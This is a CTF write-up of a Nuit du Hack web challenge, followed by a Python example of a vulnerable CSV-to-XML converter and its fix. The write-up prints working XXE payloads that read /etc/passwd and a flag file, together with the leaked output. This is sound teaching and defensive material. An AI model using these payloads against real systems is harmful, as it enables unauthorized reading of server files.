shpik's world!

[Nuit du hack XV Qual] No Pain No Gain - 75 pts

0x400 CTF

No Pain No Gain

 Challenge validated!

Description

Uploading a CSV file that will be processed to HTML. The purpose of this challenge is to catch the flag file.


Details

Points: 75
Category: Web
Validations: 81
Url: http://nopainnogain.quals.nuitduhack.com/

Attachments

This challenge has no attachment.


I took part in the Nuit du Hack CTF over the weekend.


The challenge page looks like this:


Please upload a CSV file like this:
<!-- Invitations --> 
id,name,email 
1,name1,email1@mail.com 
2,name2,email2@mail.com
Select file
Submit


As shown above, the page is very simple.


Next, I created a CSV file like the example above and uploaded it.

<!-- Invitations -->
id,name,email
1,name1,email1@mail.com
2,name2,email2@mail.com 

ID  Name   Email
1   name1  email1@mail.com
2   name2  email2@mail.com


The upload is rendered as the table above.


Uploading the following file instead produces an error.

<!-- Invitations -->
id,name,email
<code>,name1,email1@mail.com
2,name2,email2@mail.com 

Could not convert the CSV to XML!
Please follow the example above.


In this challenge, the uploaded CSV is converted to XML, and the resulting XML is then parsed and displayed on the page.


I then used an XXE vulnerability to obtain the flag.


<!DOCTYPE root[<!ENTITY foo SYSTEM "file:///etc/passwd">]>
id,name,email
1,name1,&foo;
2,name2,email2@mail.com

ID  Name   Email
1   name1  root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false flag:x:1000:1000::/home/flag:/bin/sh
2   name2  email2@mail.com


A user named flag exists, so I guessed that the flag would be at /home/flag/flag and uploaded the following CSV file.

<!DOCTYPE root[<!ENTITY foo SYSTEM "file:///home/flag/flag">]>
id,name,email
1,name1,&foo;
2,name2,email2@mail.com

ID  Name   Email
1   name1  NDH{U3VwZXIgTWFyaW8gQnJvcw0K44K544O844OR44O844Oe44Oq44Kq44OW44Op44K244O844K6DQpTxatwxIEgTWFyaW8gQnVyYXrEgXp1DQrYs9mI2KjYsdmF2KfYsdmK2Yg=}
2   name2  email2@mail.com




Flag is 

NDH{U3VwZXIgTWFyaW8gQnJvcw0K44K544O844OR44O844Oe44Oq44Kq44OW44Op44K244O844K6DQpTxatwxIEgTWFyaW8gQnVyYXrEgXp1DQrYs9mI2KjYsdmF2KfYsdmK2Yg=}
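
The behaviour observed above (a raw <code> cell breaks the conversion, and a DOCTYPE on the first line is honoured) is reproduced below, together with the fix. This is an added Python example, not the challenge's own code. naive_csv_to_xml is an assumed reconstruction of the vulnerable pattern; safe_csv_to_xml and parse_without_dtd are hypothetical names for the hardened converter and a parser wrapper that refuses DOCTYPE declarations.

```python
import csv
import xml.etree.ElementTree as ET
from xml.parsers import expat

COLUMNS = ("id", "name", "email")  # fixed element names, never taken from the upload

# Constructed sample inputs, copied from the uploads shown in the write-up.
XXE_CSV = ('<!DOCTYPE root[<!ENTITY foo SYSTEM "file:///etc/passwd">]>\n'
           'id,name,email\n1,name1,&foo;\n')
TAG_CSV = '<!-- Invitations -->\nid,name,email\n<code>,name1,email1@mail.com\n'

def naive_csv_to_xml(text):
    """Assumed vulnerable pattern: line 1 and every cell are pasted in as raw markup."""
    first, _header, *rows = text.splitlines()
    body = "".join(
        "<row>" + "".join(f"<{c}>{v}</{c}>" for c, v in zip(COLUMNS, r.split(","))) + "</row>"
        for r in rows)
    return f"{first}<root>{body}</root>"

def safe_csv_to_xml(text):
    """Hardened form: ignore line 1 and build nodes through the API so cells stay text."""
    _first, _header, *rows = text.splitlines()
    root = ET.Element("root")
    for rec in csv.reader(rows):
        row = ET.SubElement(root, "row")
        for col, val in zip(COLUMNS, rec):
            ET.SubElement(row, col).text = val  # serializer escapes '&' and '<'
    return ET.tostring(root, encoding="unicode")

def parse_without_dtd(xml_text):
    """Refuse any DOCTYPE (and so any entity declaration) before building the tree."""
    def forbid(name, sysid, pubid, has_internal_subset):
        raise ValueError("DOCTYPE declarations are not accepted")
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = forbid
    checker.Parse(xml_text, True)  # raises ValueError on DOCTYPE, ExpatError on bad XML
    return ET.fromstring(xml_text)

if __name__ == "__main__":
    print(naive_csv_to_xml(XXE_CSV))  # DOCTYPE and &foo; survive as markup
    print(safe_csv_to_xml(XXE_CSV))   # &foo; is serialized as &amp;foo;
```

Either control alone closes the hole shown in the write-up; using both means a later change to the converter does not silently reopen it.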